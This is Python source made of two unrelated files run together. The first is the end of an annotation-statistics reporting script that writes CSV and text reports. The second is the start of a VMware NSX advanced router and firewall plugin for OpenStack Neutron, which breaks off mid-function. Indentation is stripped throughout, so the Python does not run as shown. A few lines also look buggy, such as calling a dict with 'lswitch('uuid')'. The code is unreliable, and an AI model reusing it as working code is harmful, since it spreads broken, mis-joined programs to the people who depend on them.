reporter = MAT.Document.AnnotationReporter(partitionByLabel = options.partition_by_label)
reporter.addPosition(concordanceContext = DO_CONCORDANCE, concordanceWindow = CONCORDANCE_WINDOW)
# For each file, load the document using IO_TYPE, and extract the content
# annotations.
fileData = {}
allLabels = set()
for path in FILES:
if options.verbose:
print "Generating statistics for", path, "..."
basename = os.path.basename(path)
doc = IO_TYPE.readFromSource(path)
fileData[basename] = {"length": len(doc.signal)}
if CACHED_LABELS is not None:
aNames = CACHED_LABELS
else:
# Only if --content_annotations_all was provided.
aNames = doc.atypeRepository.keys()
allLabels.update(aNames)
fileData[basename]["annots"] = reporter.addDocument(doc, basename, aNames, includeSpanless = options.include_spanless)
if not os.path.exists(options.output_dir):
os.makedirs(options.output_dir)
if options.csv:
if options.verbose:
print "Generating main CSV file..."
headers, csvRows = reporter.getHeadersAndRows()
if options.interpolate_file_info:
# The basename will be first, because we used addDocument.
labelIndex = headers.index("label")
headers[1:1] = ["file_size", "count_for_label"]
finalRows = []
for r in csvRows:
file = r[0]
label = r[labelIndex]
fileInfo = fileData[file]
finalRows.append([file, fileInfo["length"], fileInfo["annots"][label]] + r[1:])
csvRows = finalRows
# Once we've interpolated the file info, the label is superfluous.
labelIndex = headers.index("label")
csvRows = [r[0:labelIndex] + r[labelIndex + 1:] for r in csvRows]
headers = headers[0:labelIndex] + headers[labelIndex+1:]
WriteableTable().writeCSV(os.path.join(options.output_dir, "report.csv"), headers, csvRows)
if options.partition_by_label:
for k, (headers, theseRows) in reporter.getPartitionedHeadersAndRows().items():
if options.verbose:
print "Generating CSV file for %s..." % k
WriteableTable().writeCSV(os.path.join(options.output_dir, "report_"+k+".csv"), headers, theseRows)
if options.txt:
if options.verbose:
print "Generating main text file..."
import codecs
# First, let's create the rows I'm working with. Remove newlines!
import re
NL_PAT = re.compile("[\n\r]")
def formatNL(sep, s):
if s is None:
return ""
else:
return NL_PAT.sub(sep, s)
def formatLoc(file, start, end):
if (start is None) or (end is None):
return file
else:
return "%s:%d-%d" % (file, start, end)
ignore, allRows = reporter.getHeadersAndRows()
if DO_CONCORDANCE:
if options.interpolate_file_info:
headers = ["Location", "File size", "#Annots", "Left context", "Text", "Label", "Right context"]
txtRows = [(formatLoc(file, start, end), str(fileData[file]["length"]),
str(fileData[file]["annots"][label]),
formatNL(" ", left),
formatNL(" ", text), description, formatNL(" ", right))
for (file, start, end, left, text, label, description, right) in allRows]
else:
headers = ["Location", "Left context", "Text", "Label", "Right context"]
txtRows = [(formatLoc(file, start, end), formatNL(", ", left),
formatNL(" ", text), description, formatNL(" ", right))
for (file, start, end, left, text, label, description, right) in allRows]
elif options.interpolate_file_info:
headers = ["Location", "File size", "#Annots", "Text", "Label"]
txtRows = [(formatLoc(file, start, end), str(fileData[file]["length"]),
str(fileData[file]["annots"][label]),
formatNL(" ", text), description)
for (file, start, end, text, label, description) in allRows]
else:
headers = ["Location", "Text", "Label"]
txtRows = [(formatLoc(file, start, end), formatNL(" ", text), description)
for (file, start, end, text, label, description) in allRows]
# Now, sometimes the overall line length is going to be enormous, thanks to
# very complex, recursive label descriptions. So I should test this.
skipIt = False
for row in txtRows:
if sum([len(s) for s in row]) > (6 * CONCORDANCE_WINDOW):
print >> sys.stderr, "Skipping main text file output because row length exceeds 6 * concordance window."
skipIt = True
break
if not skipIt:
fp = codecs.open(os.path.join(options.output_dir, "report.txt"), "w", 'utf-8')
fp.write(WriteableTable().format(headers, txtRows))
fp.close()
if options.partition_by_label:
for k, (origHeaders, theseRows) in reporter.getPartitionedHeadersAndRows().items():
if options.verbose:
print "Generating text file for %s..." % k
textIndex = origHeaders.index("text")
headers = ["Location", "ID"]
if DO_CONCORDANCE:
headers += ["Left context", "Text"]
rcIndex = origHeaders.index("right context")
headers += origHeaders[textIndex + 1:rcIndex]
headers.append("Right context")
txtRows = []
lcIndex = origHeaders.index("left context")
for row in theseRows:
file, start, end, aid, left, text = row[:6]
txtRows.append([formatLoc(file, start, end), str(aid), formatNL(", ", left), formatNL(" ", text)] + \
[s or "" for s in row[6:rcIndex]] + [formatNL(" ", row[rcIndex])])
else:
headers += ["Text"]
headers += origHeaders[textIndex + 1:]
txtRows = []
for row in theseRows:
file, start, end, aid, text = row[:5]
txtRows.append([formatLoc(file, start, end), str(aid), formatNL(" ", text)] + \
[s or "" for s in row[5:]])
skipIt = False
for row in txtRows:
if sum([len(s) for s in row]) > (6 * CONCORDANCE_WINDOW):
print >> sys.stderr, "Skipping text file output for %s because row length exceeds 6 * concordance window." % k
skipIt = True
break
if not skipIt:
fp = codecs.open(os.path.join(options.output_dir, "report_"+k+".txt"), "w", 'utf-8')
fp.write(WriteableTable().format(headers, txtRows))
fp.close()
if options.file_csv:
if options.verbose:
print "Generating file info CSV..."
labels = list(allLabels)
labels.sort()
WriteableTable().writeCSV(os.path.join(options.output_dir, "file_report.csv"), ("file", "file_size") + tuple(labels),
[(os.path.basename(path), fileData[os.path.basename(path)]["length"]) +
tuple([fileData[os.path.basename(path)]["annots"].get(label, 0) for label in labels])
for path in FILES])
if options.verbose:
print "Done."
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 VMware, Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import netaddr
from oslo.config import cfg
from neutron.common import exceptions as n_exc
from neutron.db.firewall import firewall_db
from neutron.db import l3_db
from neutron.db.loadbalancer import loadbalancer_db
from neutron.db import routedserviceinsertion_db as rsi_db
from neutron.db.vpn import vpn_db
from neutron.extensions import firewall as fw_ext
from neutron.extensions import l3
from neutron.extensions import routedserviceinsertion as rsi
from neutron.extensions import vpnaas as vpn_ext
from neutron.openstack.common import excutils
from neutron.openstack.common import log as logging
from neutron.plugins.common import constants as service_constants
from neutron.plugins.vmware.api_client import exception as api_exc
from neutron.plugins.vmware.common import config # noqa
from neutron.plugins.vmware.common import exceptions as nsx_exc
from neutron.plugins.vmware.common import utils
from neutron.plugins.vmware.dbexts import servicerouter as sr_db
from neutron.plugins.vmware.dbexts import vcns_db
from neutron.plugins.vmware.dbexts import vcns_models
from neutron.plugins.vmware.extensions import servicerouter as sr
from neutron.plugins.vmware.nsxlib import router as routerlib
from neutron.plugins.vmware.nsxlib import switch as switchlib
from neutron.plugins.vmware.plugins import base
from neutron.plugins.vmware.vshield.common import constants as vcns_const
from neutron.plugins.vmware.vshield.common import exceptions
from neutron.plugins.vmware.vshield.tasks import constants as tasks_const
from neutron.plugins.vmware.vshield import vcns_driver
from sqlalchemy.orm import exc as sa_exc
LOG = logging.getLogger(__name__)
ROUTER_TYPE_BASIC = 1
ROUTER_TYPE_ADVANCED = 2
ROUTER_STATUS = [
service_constants.ACTIVE,
service_constants.DOWN,
service_constants.PENDING_CREATE,
service_constants.PENDING_DELETE,
service_constants.ERROR
]
ROUTER_STATUS_LEVEL = {
service_constants.ACTIVE: vcns_const.RouterStatus.ROUTER_STATUS_ACTIVE,
service_constants.DOWN: vcns_const.RouterStatus.ROUTER_STATUS_DOWN,
service_constants.PENDING_CREATE: (
vcns_const.RouterStatus.ROUTER_STATUS_PENDING_CREATE
),
service_constants.PENDING_DELETE: (
vcns_const.RouterStatus.ROUTER_STATUS_PENDING_DELETE
),
service_constants.ERROR: vcns_const.RouterStatus.ROUTER_STATUS_ERROR
}
class NsxAdvancedPlugin(sr_db.ServiceRouter_mixin,
base.NsxPluginV2,
rsi_db.RoutedServiceInsertionDbMixin,
firewall_db.Firewall_db_mixin,
loadbalancer_db.LoadBalancerPluginDb,
vpn_db.VPNPluginDb
):
supported_extension_aliases = (
base.NsxPluginV2.supported_extension_aliases + [
"service-router",
"routed-service-insertion",
"fwaas",
"lbaas",
"vpnaas"
])
# The service plugin cannot currently support pagination
__native_pagination_support = False
__native_sorting_support = False
def __init__(self):
super(NsxAdvancedPlugin, self).__init__()
self._super_create_ext_gw_port = (
self._port_drivers['create'][l3_db.DEVICE_OWNER_ROUTER_GW])
self._super_delete_ext_gw_port = (
self._port_drivers['delete'][l3_db.DEVICE_OWNER_ROUTER_GW])
self._port_drivers['create'][l3_db.DEVICE_OWNER_ROUTER_GW] = (
self._vcns_create_ext_gw_port)
self._port_drivers['delete'][l3_db.DEVICE_OWNER_ROUTER_GW] = (
self._vcns_delete_ext_gw_port)
# cache router type based on router id
self._router_type = {}
self.callbacks = VcnsCallbacks(self.safe_reference)
# load the vCNS driver
self._load_vcns_drivers()
# switchlib's create_lswitch needs to be replaced in order to proxy
# logical switch create requests to vcns
self._set_create_lswitch_proxy()
def _set_create_lswitch_proxy(self):
base.switchlib.create_lswitch = self._proxy_create_lswitch
def _proxy_create_lswitch(self, *args, **kwargs):
name, tz_config, tags = (
_process_base_create_lswitch_args(*args, **kwargs)
)
return self.vcns_driver.create_lswitch(
name, tz_config, tags=tags,
port_isolation=None, replication_mode=None)
def _load_vcns_drivers(self):
self.vcns_driver = vcns_driver.VcnsDriver(self.callbacks)
def _set_router_type(self, router_id, router_type):
self._router_type[router_id] = router_type
def _get_router_type(self, context=None, router_id=None, router=None):
if not router:
if router_id in self._router_type:
return self._router_type[router_id]
router = self._get_router(context, router_id)
LOG.debug(_("EDGE: router = %s"), router)
if router['nsx_attributes']['service_router']:
router_type = ROUTER_TYPE_ADVANCED
else:
router_type = ROUTER_TYPE_BASIC
self._set_router_type(router['id'], router_type)
return router_type
def _find_router_type(self, router):
is_service_router = router.get(sr.SERVICE_ROUTER, False)
if is_service_router:
return ROUTER_TYPE_ADVANCED
else:
return ROUTER_TYPE_BASIC
def _is_advanced_service_router(self, context=None, router_id=None,
router=None):
if router:
router_type = self._get_router_type(router=router)
else:
router_type = self._get_router_type(context, router_id)
return (router_type == ROUTER_TYPE_ADVANCED)
def _vcns_create_ext_gw_port(self, context, port_data):
router_id = port_data['device_id']
if not self._is_advanced_service_router(context, router_id):
self._super_create_ext_gw_port(context, port_data)
return
# NOP for Edge because currently the port will be create internally
# by VSM
LOG.debug(_("EDGE: _vcns_create_ext_gw_port"))
def _vcns_delete_ext_gw_port(self, context, port_data):
router_id = port_data['device_id']
if not self._is_advanced_service_router(context, router_id):
self._super_delete_ext_gw_port(context, port_data)
return
# NOP for Edge
LOG.debug(_("EDGE: _vcns_delete_ext_gw_port"))
def _get_external_attachment_info(self, context, router):
gw_port = router.gw_port
ipaddress = None
netmask = None
nexthop = None
if gw_port:
# gw_port may have multiple IPs, only configure the first one
if gw_port.get('fixed_ips'):
ipaddress = gw_port['fixed_ips'][0]['ip_address']
network_id = gw_port.get('network_id')
if network_id:
ext_net = self._get_network(context, network_id)
if not ext_net.external:
msg = (_("Network '%s' is not a valid external "
"network") % network_id)
raise n_exc.BadRequest(resource='router', msg=msg)
if ext_net.subnets:
ext_subnet = ext_net.subnets[0]
netmask = str(netaddr.IPNetwork(ext_subnet.cidr).netmask)
nexthop = ext_subnet.gateway_ip
return (ipaddress, netmask, nexthop)
def _get_external_gateway_address(self, context, router):
ipaddress, netmask, nexthop = self._get_external_attachment_info(
context, router)
return nexthop
def _vcns_update_static_routes(self, context, **kwargs):
router = kwargs.get('router')
if router is None:
router = self._get_router(context, kwargs['router_id'])
edge_id = kwargs.get('edge_id')
if edge_id is None:
binding = vcns_db.get_vcns_router_binding(context.session,
router['id'])
edge_id = binding['edge_id']
skippable = True
if 'nexthop' in kwargs:
nexthop = kwargs['nexthop']
# The default gateway and vnic config has dependencies, if we
# explicitly specify nexthop to change, tell the driver not to
# skip this route update
skippable = False
else:
nexthop = self._get_external_gateway_address(context,
router)
if 'subnets' in kwargs:
subnets = kwargs['subnets']
else:
subnets = self._find_router_subnets_cidrs(context.elevated(),
router['id'])
routes = []
for subnet in subnets:
routes.append({
'cidr': subnet,
'nexthop': vcns_const.INTEGRATION_LR_IPADDRESS.split('/')[0]
})
self.vcns_driver.update_routes(router['id'], edge_id, nexthop, routes,
skippable)
def _get_nat_rules(self, context, router):
fip_qry = context.session.query(l3_db.FloatingIP)
fip_db = fip_qry.filter_by(router_id=router['id']).all()
dnat = []
snat = []
for fip in fip_db:
if fip.fixed_port_id:
dnat.append({
'dst': fip.floating_ip_address,
'translated': fip.fixed_ip_address
})
gw_port = router.gw_port
if gw_port and router.enable_snat:
if gw_port.get('fixed_ips'):
snat_ip = gw_port['fixed_ips'][0]['ip_address']
subnets = self._find_router_subnets_cidrs(context.elevated(),
router['id'])
for subnet in subnets:
snat.append({
'src': subnet,
'translated': snat_ip
})
return (snat, dnat)
def _update_nat_rules(self, context, router):
snat, dnat = self._get_nat_rules(context, router)
binding = vcns_db.get_vcns_router_binding(context.session,
router['id'])
self.vcns_driver.update_nat_rules(router['id'],
binding['edge_id'],
snat, dnat)
def _update_interface(self, context, router, sync=False):
addr, mask, nexthop = self._get_external_attachment_info(
context, router)
secondary = []
fip_qry = context.session.query(l3_db.FloatingIP)
fip_db = fip_qry.filter_by(router_id=router['id']).all()
for fip in fip_db:
if fip.fixed_port_id:
secondary.append(fip.floating_ip_address)
#Add all vip addresses bound on the router
vip_addrs = self._get_all_vip_addrs_by_router_id(context,
router['id'])
secondary.extend(vip_addrs)
binding = vcns_db.get_vcns_router_binding(context.session,
router['id'])
task = self.vcns_driver.update_interface(
router['id'], binding['edge_id'],
vcns_const.EXTERNAL_VNIC_INDEX,
self.vcns_driver.external_network,
addr, mask, secondary=secondary)
if sync:
task.wait(tasks_const.TaskState.RESULT)
def _update_router_gw_info(self, context, router_id, info):
if not self._is_advanced_service_router(context, router_id):
super(NsxAdvancedPlugin, self)._update_router_gw_info(
context, router_id, info)
return
# get original gw_port config
router = self._get_router(context, router_id)
org_ext_net_id = router.gw_port_id and router.gw_port.network_id
org_enable_snat = router.enable_snat
orgaddr, orgmask, orgnexthop = self._get_external_attachment_info(
context, router)
super(base.NsxPluginV2, self)._update_router_gw_info(
context, router_id, info, router=router)
new_ext_net_id = router.gw_port_id and router.gw_port.network_id
new_enable_snat = router.enable_snat
newaddr, newmask, newnexthop = self._get_external_attachment_info(
context, router)
binding = vcns_db.get_vcns_router_binding(context.session, router_id)
if new_ext_net_id != org_ext_net_id and orgnexthop:
# network changed, need to remove default gateway before vnic
# can be configured
LOG.debug(_("VCNS: delete default gateway %s"), orgnexthop)
self._vcns_update_static_routes(context,
router=router,
edge_id=binding['edge_id'],
nexthop=None)
if orgaddr != newaddr or orgmask != newmask:
self.vcns_driver.update_interface(
router_id, binding['edge_id'],
vcns_const.EXTERNAL_VNIC_INDEX,
self.vcns_driver.external_network,
newaddr, newmask)
if orgnexthop != newnexthop:
self._vcns_update_static_routes(context,
router=router,
edge_id=binding['edge_id'],
nexthop=newnexthop)
if (new_ext_net_id == org_ext_net_id and
org_enable_snat == new_enable_snat):
return
self._update_nat_rules(context, router)
def _add_subnet_snat_rule(self, context, router, subnet):
# NOP for service router
if not self._is_advanced_service_router(router=router):
super(NsxAdvancedPlugin, self)._add_subnet_snat_rule(
context, router, subnet)
def _delete_subnet_snat_rule(self, context, router, subnet):
# NOP for service router
if not self._is_advanced_service_router(router=router):
super(NsxAdvancedPlugin, self)._delete_subnet_snat_rule(
context, router, subnet)
def _remove_floatingip_address(self, context, fip_db):
# NOP for service router
router_id = fip_db.router_id
if not self._is_advanced_service_router(context, router_id):
super(NsxAdvancedPlugin, self)._remove_floatingip_address(
context, fip_db)
def _create_advanced_service_router(self, context, neutron_router_id,
name, lrouter, lswitch):
# store binding
binding = vcns_db.add_vcns_router_binding(
context.session, neutron_router_id, None, lswitch['uuid'],
service_constants.PENDING_CREATE)
# deploy edge
jobdata = {
'neutron_router_id': neutron_router_id,
'lrouter': lrouter,
'lswitch': lswitch,
'context': context
}
# deploy and wait until the deploy requeste has been requested
# so we will have edge_id ready. The wait here should be fine
# as we're not in a database transaction now
self.vcns_driver.deploy_edge(
lrouter['uuid'], name, lswitch['uuid'], jobdata=jobdata,
wait_for_exec=True)
return binding
def _create_integration_lswitch(self, tenant_id, name):
# use defautl transport zone
transport_zone_config = [{
"zone_uuid": self.cluster.default_tz_uuid,
"transport_type": cfg.CONF.NSX.default_transport_type
}]
return self.vcns_driver.create_lswitch(name, transport_zone_config)
def _add_router_integration_interface(self, tenant_id, name,
lrouter, lswitch):
# create logic switch port
try:
ls_port = switchlib.create_lport(
self.cluster, lswitch['uuid'], tenant_id,
'', '', lrouter['uuid'], True)
except api_exc.NsxApiException:
msg = (_("An exception occurred while creating a port "
"on lswitch %s") % lswitch['uuid'])
LOG.exception(msg)
raise n_exc.NeutronException(message=msg)
# create logic router port
try:
neutron_port_id = ''
pname = name[:36] + '-lp'
admin_status_enabled = True
lr_port = routerlib.create_router_lport(
self.cluster, lrouter['uuid'], tenant_id,
neutron_port_id, pname, admin_status_enabled,
[vcns_const.INTEGRATION_LR_IPADDRESS])
except api_exc.NsxApiException:
msg = (_("Unable to create port on NSX logical router %s") % name)
LOG.exception(msg)
switchlib.delete_port(
self.cluster, lswitch['uuid'], ls_port['uuid'])
raise n_exc.NeutronException(message=msg)
# attach logic router port to switch port
try:
self._update_router_port_attachment(
self.cluster, None, lrouter['uuid'], {}, lr_port['uuid'],
'PatchAttachment', ls_port['uuid'], None)
except api_exc.NsxApiException as e:
# lr_port should have been deleted
switchlib.delete_port(
self.cluster, lswitch['uuid'], ls_port['uuid'])
raise e
def _create_lrouter(self, context, router, nexthop):
lrouter = super(NsxAdvancedPlugin, self)._create_lrouter(
context, router, vcns_const.INTEGRATION_EDGE_IPADDRESS)
router_type = self._find_router_type(router)
self._set_router_type(lrouter['uuid'], router_type)
if router_type == ROUTER_TYPE_BASIC:
return lrouter
tenant_id = self._get_tenant_id_for_create(context, router)
name = router['name']
try:
lsname = name[:36] + '-ls'
lswitch = self._create_integration_lswitch(
tenant_id, lsname)
except Exception:
msg = _("Unable to create integration logic switch "
"for router %s") % name
LOG.exception(msg)
routerlib.delete_lrouter(self.cluster, lrouter['uuid'])
raise n_exc.NeutronException(message=msg)
try:
self._add_router_integration_interface(tenant_id, name,
lrouter, lswitch)
except Exception:
msg = _("Unable to add router interface to integration lswitch "
"for router %s") % name
LOG.exception(msg)
routerlib.delete_lrouter(self.cluster, lrouter['uuid'])
raise n_exc.NeutronException(message=msg)
try:
self._create_advanced_service_router(
context, router['id'], name, lrouter, lswitch)
except Exception:
msg = (_("Unable to create advance service router for %s") % name)
LOG.exception(msg)
self.vcns_driver.delete_lswitch(lswitch('uuid'))
routerlib.delete_lrouter(self.cluster, lrouter['uuid'])
raise n_exc.NeutronException(message=msg)
lrouter['status'] = service_constants.PENDING_CREATE
return lrouter
def check_router_in_use(self, context, router_id):
router_filter = {'router_id': [router_id]}
vpnservices = self.get_vpnservices(
context, filters={'router_id': [router_id]})
if vpnservices:
raise vpn_ext.RouterInUseByVPNService(
router_id=router_id,
vpnservice_id=vpnservices[0]['id'])
vips = self.get_vips(
context, filters=router_filter)
if vips:
raise nsx_exc.RouterInUseByLBService(
router_id=router_id,
vip_id=vips[0]['id'])
firewalls = self.get_firewalls(
context, filters=router_filter)
if firewalls:
raise nsx_exc.RouterInUseByFWService(
router_id=router_id,
firewall_id=firewalls[0]['id'])
def check_router(self, context, router_id):
if not router_id:
msg = _("router_id is not provided!")
raise n_exc.BadRequest(resource='router', msg=msg)
router = self._get_router(context, router_id)
if not self._is_advanced_service_router(context, router=router):
msg = _("router_id:%s is not an advanced router!") % router['id']
raise n_exc.BadRequest(resource='router', msg=msg)
if router['status'] != service_constants.ACTIVE:
raise nsx_exc.AdvRouterServiceUnavailable(router_id=router['id'])
def _delete_lrouter(self, context, router_id, nsx_router_id):
binding = vcns_db.get_vcns_router_binding(context.session, router_id)
if not binding:
super(NsxAdvancedPlugin, self)._delete_lrouter(
context, router_id, nsx_router_id)
else:
#Check whether router has an advanced service inserted.
self.check_router_in_use(context, router_id)
vcns_db.update_vcns_router_binding(
context.session, router_id,
status=service_constants.PENDING_DELETE)
lswitch_id = binding['lswitch_id']
edge_id = binding['edge_id']
# delete lswitch
try:
self.vcns_driver.delete_lswitch(lswitch_id)
except exceptions.ResourceNotFound:
LOG.warning(_("Did not found lswitch %s in NSX"), lswitch_id)
# delete edge
jobdata = {
'context': context
}
self.vcns_driver.delete_edge(router_id, edge_id, jobdata=jobdata)
# delete NSX logical router
routerlib.delete_lrouter(self.cluster, nsx_router_id)
if id in self._router_type:
del self._router_type[router_id]
def _update_lrouter(self, context, router_id, name, nexthop, routes=None):
if not self._is_advanced_service_router(context, router_id):
return super(NsxAdvancedPlugin, self)._update_lrouter(
context, router_id, name, nexthop, routes=routes)
previous_routes = super(NsxAdvancedPlugin, self)._update_lrouter(
context, router_id, name,
vcns_const.INTEGRATION_EDGE_IPADDRESS, routes=routes)
# TODO(fank): Theoretically users can specify extra routes for
# physical network, and routes for phyiscal network needs to be
# configured on Edge. This can be done by checking if nexthop is in
# external network. But for now we only handle routes for logic
# space and leave it for future enhancement.
# Let _update_router_gw_info handle nexthop change
#self._vcns_update_static_routes(context, router_id=router_id)
return previous_routes
def _retrieve_and_delete_nat_rules(self, context, floating_ip_address,
internal_ip, router_id,
min_num_rules_expected=0):
# NOP for advanced service router
if not self._is_advanced_service_router(context, router_id):
super(NsxAdvancedPlugin, self)._retrieve_and_delete_nat_rules(
context, floating_ip_address, internal_ip, router_id,
min_num_rules_expected=min_num_rules_expected)
def _update_fip_assoc(self, context, fip, floatingip_db, external_port):
# Update DB model only for advanced service router
router_id = self._get_fip_assoc_data(context, fip, floatingip_db)[2]
if (router_id and
not self._is_advanced_service_router(context, router_id)):
super(NsxAdvancedPlugin, self)._update_fip_assoc(
context, fip, floatingip_db, external_port)
else:
super(base.NsxPluginV2, self)._update_fip_assoc(
context, fip, floatingip_db, external_port)
def _get_nsx_lrouter_status(self, id):
try:
lrouter = routerlib.get_lrouter(self.cluster, id)
lr_status = lrouter["_relations"]["LogicalRouterStatus"]
if lr_status["fabric_status"]:
nsx_status = vcns_const.RouterStatus.ROUTER_STATUS_ACTIVE
else:
nsx_status = vcns_const.RouterStatus.ROUTER_STATUS_DOWN
except n_exc.NotFound:
nsx_status = vcns_const.RouterStatus.ROUTER_STATUS_ERROR
return nsx_status
def _get_vse_status(self, context, id):
binding = vcns_db.get_vcns_router_binding(context.session, id)
edge_status_level = self.vcns_driver.get_edge_status(
binding['edge_id'])
edge_db_status_level = ROUTER_STATUS_LEVEL[binding.status]
if edge_status_level > edge_db_status_level:
return edge_status_level
else:
return edge_db_status_level
def _get_all_nsx_lrouters_statuses(self, tenant_id, fields):
# get nsx lrouters status
nsx_lrouters = routerlib.get_lrouters(self.cluster,
tenant_id,
fields)
nsx_status = {}
for nsx_lrouter in nsx_lrouters:
if (nsx_lrouter["_relations"]["LogicalRouterStatus"]
["fabric_status"]):
nsx_status[nsx_lrouter['uuid']] = (
vcns_const.RouterStatus.ROUTER_STATUS_ACTIVE
)
else:
nsx_status[nsx_lrouter['uuid']] = (
vcns_const.RouterStatus.ROUTER_STATUS_DOWN
)
return nsx_status
def _get_all_vse_statuses(self, context):
bindings = self._model_query(
context, vcns_models.VcnsRouterBinding)
vse_db_status_level = {}
edge_id_to_router_id = {}
router_ids = []
for binding in bindings:
if not binding['edge_id']:
continue
router_id = binding['router_id']
router_ids.append(router_id)
edge_id_to_router_id[binding['edge_id']] = router_id
vse_db_status_level[router_id] = (
ROUTER_STATUS_LEVEL[binding['status']])
if not vse_db_status_level:
# no advanced service router, no need to query
return {}
vse_status_level = {}
edges_status_level = self.vcns_driver.get_edges_statuses()
for edge_id, status_level in edges_status_level.iteritems():
if edge_id in edge_id_to_router_id:
router_id = edge_id_to_router_id[edge_id]
db_status_level = vse_db_status_level[router_id]
if status_level > db_status_level:
vse_status_level[router_id] = status_level
else:
vse_status_level[router_id] = db_status_level
return vse_status_level
def get_router(self, context, id, fields=None):
if fields and 'status' not in fields:
return super(NsxAdvancedPlugin, self).get_router(
context, id, fields=fields)
router = super(NsxAdvancedPlugin, self).get_router(context, id)
router_type = self._find_router_type(router)
if router_type == ROUTER_TYPE_ADVANCED:
vse_status_level = self._get_vse_status(context, id)
if vse_status_level > ROUTER_STATUS_LEVEL[router['status']]:
router['status'] = ROUTER_STATUS[vse_status_level]
return self._fields(router, fields)
def get_routers(self, context, filters=None, fields=None, **kwargs):
routers = super(NsxAdvancedPlugin, self).get_routers(
context, filters=filters, **kwargs)
if fields and 'status' not in fields:
# no status checking, just return regular get_routers
return [self._fields(router, fields) for router in routers]
for router in routers:
router_type = self._find_router_type(router)
if router_type == ROUTER_TYPE_ADVANCED:
break
else:
# no advanced service router, return here
return [self._fields(router, fields) for router in routers]
vse_status_all = self._get_all_vse_statuses(context)
for router in routers:
router_type = self._find_router_type(router)
if router_type == ROUTER_TYPE_ADVANCED:
vse_status_level = vse_status_all.get(router['id'])
if vse_status_level is None:
vse_status_level = (
vcns_const.RouterStatus.ROUTER_STATUS_ERROR)
if vse_status_level > ROUTER_STATUS_LEVEL[router['status']]:
router['status'] = ROUTER_STATUS[vse_status_level]
return [self._fields(router, fields) for router in routers]
def add_router_interface(self, context, router_id, interface_info):
info = super(NsxAdvancedPlugin, self).add_router_interface(
context, router_id, interface_info)
if self._is_advanced_service_router(context, router_id):
router = self._get_router(context, router_id)
if router.enable_snat:
self._update_nat_rules(context, router)
# TODO(fank): do rollback on error, or have a dedicated thread
# do sync work (rollback, re-configure, or make router down)
self._vcns_update_static_routes(context, router=router)
return info
def remove_router_interface(self, context, router_id, interface_info):
info = super(NsxAdvancedPlugin, self).remove_router_interface(
context, router_id, interface_info)
if self._is_advanced_service_router(context, router_id):
router = self._get_router(context, router_id)
if router.enable_snat:
self._update_nat_rules(context, router)
# TODO(fank): do rollback on error, or have a dedicated thread
# do sync work (rollback, re-configure, or make router down)
self._vcns_update_static_routes(context, router=router)
return info
def create_floatingip(self, context, floatingip):
fip = super(NsxAdvancedPlugin, self).create_floatingip(
context, floatingip)
router_id = fip.get('router_id')
if router_id and self._is_advanced_service_router(context, router_id):
router = self._get_router(context, router_id)
# TODO(fank): do rollback on error, or have a dedicated thread
# do sync work (rollback, re-configure, or make router down)
self._update_nat_rules(context, router)
self._update_interface(context, router)
return fip
def update_floatingip(self, context, id, floatingip):
fip = super(NsxAdvancedPlugin, self).update_floatingip(
context, id, floatingip)
router_id = fip.get('router_id')
if router_id and self._is_advanced_service_router(context, router_id):
router = self._get_router(context, router_id)
# TODO(fank): do rollback on error, or have a dedicated thread
# do sync work (rollback, re-configure, or make router down)
self._update_nat_rules(context, router)
self._update_interface(context, router)
return fip
def delete_floatingip(self, context, id):
fip_db = self._get_floatingip(context, id)
router_id = None
if fip_db.fixed_port_id:
router_id = fip_db.router_id
super(NsxAdvancedPlugin, self).delete_floatingip(context, id)
if router_id and self._is_advanced_service_router(context, router_id):
router = self._get_router(context, router_id)
# TODO(fank): do rollback on error, or have a dedicated thread
# do sync work (rollback, re-configure, or make router down)
self._update_interface(context, router)
self._update_nat_rules(context, router)
def disassociate_floatingips(self, context, port_id):
routers = set()
try:
fip_qry = context.session.query(l3_db.FloatingIP)
fip_dbs = fip_qry.filter_by(fixed_port_id=port_id)
for fip_db in fip_dbs:
routers.add(fip_db.router_id)
except sa_exc.NoResultFound:
pass
super(NsxAdvancedPlugin, self).disassociate_floatingips(context,
port_id)
for router_id in routers:
if self._is_advanced_service_router(context, router_id):
router = self._get_router(context, router_id)
# TODO(fank): do rollback on error, or have a dedicated thread
# do sync work (rollback, re-configure, or make router down)
self._update_interface(context, router)
self._update_nat_rules(context, router)
#
# FWaaS plugin implementation
#
def _firewall_set_status(
self, context, firewall_id, status, firewall=None):
with context.session.begin(subtransactions=True):
fw_db = self._get_firewall(context, firewall_id)
if status == service_constants.PENDING_UPDATE and (
fw_db.status == service_constants.PENDING_DELETE):
raise fw_ext.FirewallInPendingState(
firewall_id=firewall_id, pending_state=status)
else:
fw_db.status = status
if firewall:
firewall['status'] = status
def _ensure_firewall_update_allowed(self, context, firewall_id):
fwall = self.get_firewall(context, firewall_id)
if fwall['status'] in [service_constants.PENDING_CREATE,
service_constants.PENDING_UPDATE,
service_constants.PENDING_DELETE]:
raise fw_ext.FirewallInPendingState(firewall_id=firewall_id,
pending_state=fwall['status'])
def _ensure_firewall_policy_update_allowed(
self, context, firewall_policy_id):
firewall_policy = self.get_firewall_policy(context, firewall_policy_id)
for firewall_id in firewall_policy.get('firewall_list', []):
self._ensure_firewall_update_allowed(context, firewall_id)
def _ensure_update_or_delete_firewall_rule(
self, context, firewall_rule_id):
fw_rule = self.get_firewall_rule(context, firewall_rule_id)
if fw_rule.get('firewall_policy_id'):
self._ensure_firewall_policy_update_allowed(
context, fw_rule['firewall_policy_id'])
def _make_firewall_rule_list_by_policy_id(self, context, fw_policy_id):
if not fw_policy_id:
return []
firewall_policy_db = self._get_firewall_policy(context, fw_policy_id)
return [
self._make_firewall_rule_dict(fw_rule_db)
for fw_rule_db in firewall_policy_db['firewall_rules']
]
def _get_edge_id_by_vcns_edge_binding(self, context,
router_id):
#Get vcns_router_binding mapping between router and edge
router_binding = vcns_db.get_vcns_router_binding(
context.session, router_id)
return router_binding.edge_id
def _get_firewall_list_from_firewall_policy(self, context, policy_id):
firewall_policy_db = self._get_firewall_policy(context, policy_id)
return [
self._make_firewall_dict(fw_db)
for fw_db in firewall_policy_db['firewalls']
]
def _get_firewall_list_from_firewall_rule(self, context, rule_id):
rule = self._get_firewall_rule(context, rule_id)
if not rule.firewall_policy_id:
